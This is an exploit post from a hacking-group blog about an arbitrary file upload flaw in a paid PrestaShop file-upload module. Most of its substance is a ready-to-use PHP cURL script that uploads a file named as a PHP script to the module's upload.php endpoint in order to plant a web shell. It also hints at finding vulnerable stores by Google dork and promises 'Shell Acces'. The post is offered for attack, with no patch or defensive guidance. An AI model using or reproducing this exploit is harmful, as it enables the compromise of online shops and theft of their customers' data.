Module Files Upload Arbitrary File Upload - PrestaShop - 3xploi7 BuG

Module Files Upload Arbitrary File Upload - PrestaShop

#- Title: Module Files Upload Arbitrary File Upload - PrestaShop
#- Author: UyulCrack
#- Published : 30/06/2016
#- Developer : Prestashop
#- Link Download : addons.prestashop .com/fr/4270-files-upload.html
#- Price : 79,99 €
#- Google Dork: Use Your Brain
#- Fixed in Version : -
#- Tested on : windows
-- Proof Of Concept --

Description : 

Simplify sending large files to your customers! This module allows your customers to send you one or more files in a simple and fast way. For example, a client wants to send EPS files of several gigabytes.
With this module you can recover the files just in the backoffice of your PrestaShop,

  • Multilingual
  • Multi Upload
  • Drag and Drop
  • Filter on file extensions
  •  Limit files size
  • Download customers files on the backoffice
  • Send a mail to the customer at the end of the upload
  • Send an email to the admin of the store
  • Only connected customers can upload files
  • Multi-Hook Module: right column, top left page, product page.

Vulnerability : 
site /modules/filesupload/upload.php

When Vuln : 
{"jsonrpc" : "2.0", "result" : null, "id" : "id"}


<?php $url = ""; // put URL Here $post = array ( "file" => "@3xploi7.jpg", "name" => "3xploi7.php" ); $ch = curl_init ("$url"); curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5); curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt ($ch, CURLOPT_POST, 1); @curl_setopt ($ch, CURLOPT_POSTFIELDS, $post); $data = curl_exec ($ch); curl_close ($ch); echo $data; ?>

If Succesfully   > 

Shell Acces ? Click Here 

Greetings by UyulCrack
Thanks for TKJ Cyber Art - Indonesian Code Party - ZeynnymouZ

3xploi7 Team

2 Responses to "Module Files Upload Arbitrary File Upload - PrestaShop"

  1. Making a topic sans preparation requires high specialized information. PrestaShop engineers can undoubtedly make another subject for your store.

  2. Hand craft templates require a considerable measure of coding and time by an expert IT more


Tempat Diskusi

Iklan Atas Artikel

3xploi7 1

seo explanation, online courses on digital marketing, internet marketing classes online

3xploi7 2

Iklan Bawah Artikel

Stay toon disini ya karena artikel akan selalu di update.
Kalau ada masalah silahkan gabung grup
Kunjungi Terus " 3xploi7 " untuk update menarik selanjutnya, Jangan sampai Terlewatkan.

• Join Grup Team :
 — Facebook Grup ( 5.325 Anggota )
 — Line Square